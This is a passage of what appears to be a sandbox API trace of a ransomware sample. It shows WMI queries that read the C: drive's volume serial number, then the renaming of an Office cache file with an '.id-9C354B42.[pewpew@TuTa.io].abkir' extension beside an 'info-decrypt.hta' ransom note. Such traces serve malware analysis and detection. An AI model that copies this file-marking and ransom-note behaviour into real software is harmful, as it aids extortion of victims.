| out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0205.018] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0205.018] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0205.019] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0205.019] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0x66ce588) returned 0x0 [0205.019] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce588, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.019] WbemDefPath:IUnknown:Release (This=0x66ce588) returned 0x3 [0205.019] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0205.019] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0205.019] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0205.019] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0205.019] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0205.019] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0205.019] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0205.019] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60308d0) returned 0x0 [0205.019] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0205.019] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0205.019] WbemDefPath:IWbemPath:SetText (This=0x60308d0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0205.019] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0205.019] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0205.019] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.019] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0205.019] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0205.019] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0205.020] IUnknown:Release (This=0xb51e34) returned 0x1 [0205.020] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6023ca8) returned 0x0 [0205.020] WbemLocator:IUnknown:QueryInterface (in: This=0x6023ca8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0205.020] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023ca8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x60272b0) returned 0x0 [0205.020] WbemLocator:IUnknown:Release (This=0x6023ca8) returned 0x0 [0205.020] WbemLocator:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x60272b0) returned 0x0 [0205.021] WbemLocator:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0205.021] WbemLocator:IUnknown:AddRef (This=0x60272b0) returned 0x3 [0205.021] WbemLocator:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0205.021] WbemLocator:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0205.021] WbemLocator:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0205.021] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0205.021] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0205.021] WbemLocator:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0205.021] WbemLocator:IUnknown:Release (This=0x60272b0) returned 0x2 [0205.021] WbemLocator:IUnknown:Release (This=0x60272b0) returned 0x1 [0205.021] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0205.021] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0205.021] WbemLocator:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x60272b0) returned 0x0 [0205.021] WbemLocator:IUnknown:AddRef (This=0x60272b0) returned 0x3 [0205.021] WbemLocator:IUnknown:Release (This=0x60272b0) returned 0x2 [0205.021] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0205.021] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0205.021] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.021] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x60271c0) returned 0x0 [0205.022] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60271c0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x6033214) returned 0x0 [0205.097] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b6d4) returned 0x0 [0205.097] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b6d4, pProxy=0x6033214, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0205.097] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x1 [0205.097] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b6f4) returned 0x0 [0205.097] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b6d4) returned 0x0 [0205.097] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b6d4, pProxy=0x6033214, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0205.097] WbemLocator:IUnknown:Release (This=0xb5b6d4) returned 0x2 [0205.097] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x1 [0205.097] CoTaskMemFree (pv=0xbd4918) [0205.098] WbemLocator:IUnknown:Release (This=0x60271c0) returned 0x0 [0205.098] WbemLocator:IUnknown:QueryInterface (in: This=0x6033214, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b6f4) returned 0x0 [0205.098] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0205.098] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0205.099] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0205.099] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0205.099] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0205.099] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b654) returned 0x0 [0205.099] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b654, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0205.099] WbemLocator:IUnknown:Release (This=0xb5b654) returned 0x3 [0205.100] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0205.100] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0205.100] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b6dc) returned 0x0 [0205.100] WbemLocator:IRpcOptions:Query (in: This=0xb5b6dc, pPrx=0xb5b6f4, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0205.100] WbemLocator:IUnknown:Release (This=0xb5b6dc) returned 0x3 [0205.100] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0205.100] CoGetContextToken (in: pToken=0x6c0f0b8 | out: pToken=0x6c0f0b8) returned 0x0 [0205.100] CoGetContextToken (in: pToken=0x6c0f018 | out: pToken=0x6c0f018) returned 0x0 [0205.100] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x6c0f0e8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6c0f0e4 | out: ppvObject=0x6c0f0e4*=0x6033214) returned 0x0 [0205.100] WbemLocator:IUnknown:AddRef (This=0x6033214) returned 0x4 [0205.100] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x3 [0205.100] WbemLocator:IUnknown:Release (This=0x6033214) returned 0x2 [0205.100] SysStringLen (param_1=0x0) returned 0x0 [0205.100] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6c0f47c | out: puCount=0x6c0f47c*=0x0) returned 0x0 [0205.100] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6c0f478*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f478*=0x20, pszText=0x0) returned 0x0 [0205.100] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6c0f478*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f478*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.100] CoGetContextToken (in: pToken=0x6c0f0e8 | out: pToken=0x6c0f0e8) returned 0x0 [0205.100] WbemLocator:IUnknown:AddRef (This=0xb5b6f4) returned 0x3 [0205.100] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b6f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef7c | out: ppvObject=0x6c0ef7c*=0xb5b6f4) returned 0x0 [0205.100] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x3 [0205.101] WbemLocator:IUnknown:Release (This=0xb5b6f4) returned 0x2 [0205.101] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6c0f480*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f480*=0x20, pszText=0x0) returned 0x0 [0205.101] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6c0f480*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f480*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0205.101] IWbemServices:GetObject (in: This=0x6033214, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6c0f434*=0x0, ppCallResult=0x0 | out: ppObject=0x6c0f434*=0x6028180, ppCallResult=0x0) returned 0x0 [0205.142] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6c0f434 | out: puCount=0x6c0f434*=0x2) returned 0x0 [0205.142] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6c0f430*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f430*=0xf, pszText=0x0) returned 0x0 [0205.142] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6c0f430*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f430*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0205.142] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f430*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3624b44*=0, plFlavor=0x3624b48*=0 | out: pVal=0x6c0f430*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3624b44*=8, plFlavor=0x3624b48*=0) returned 0x0 [0205.143] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.143] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.143] IWbemClassObject:Get (in: This=0x6028180, wszName="VolumeSerialNumber", lFlags=0, pVal=0x6c0f438*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3624b44*=8, plFlavor=0x3624b48*=0 | out: pVal=0x6c0f438*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3624b44*=8, plFlavor=0x3624b48*=0) returned 0x0 [0205.143] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.143] SysStringByteLen (bstr="9C354B42") returned 0x10 [0205.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab", lpFilePart=0x0) returned 0x4a [0205.143] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x6c0f038, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x6d [0205.143] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f498) returned 1 [0205.143] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), fInfoLevelId=0x0, lpFileInformation=0x6c0f514 | out: lpFileInformation=0x6c0f514*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x33e067a0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0205.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f494) returned 1 [0205.143] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0205.144] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f050, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpFilePart=0x0) returned 0x4d [0205.144] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta", lpFilePart=0x0) returned 0x4f [0205.144] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f4b8) returned 1 [0205.144] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\info-decrypt.hta" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6c0f534 | out: lpFileInformation=0x6c0f534*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32bb9e80, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x32bb9e80, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x32bb9e80, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0205.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f4b4) returned 1 [0205.145] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0f058, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpFilePart=0x0) returned 0x4d [0205.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f504) returned 1 [0205.145] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), fInfoLevelId=0x0, lpFileInformation=0x36251d4 | out: lpFileInformation=0x36251d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00)) returned 1 [0205.145] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6c0f500) returned 1 [0205.145] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", nBufferLength=0x105, lpBuffer=0x6c0ef44, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi", lpFilePart=0x0) returned 0x4d [0205.145] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6c0f438) returned 1 [0205.145] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, 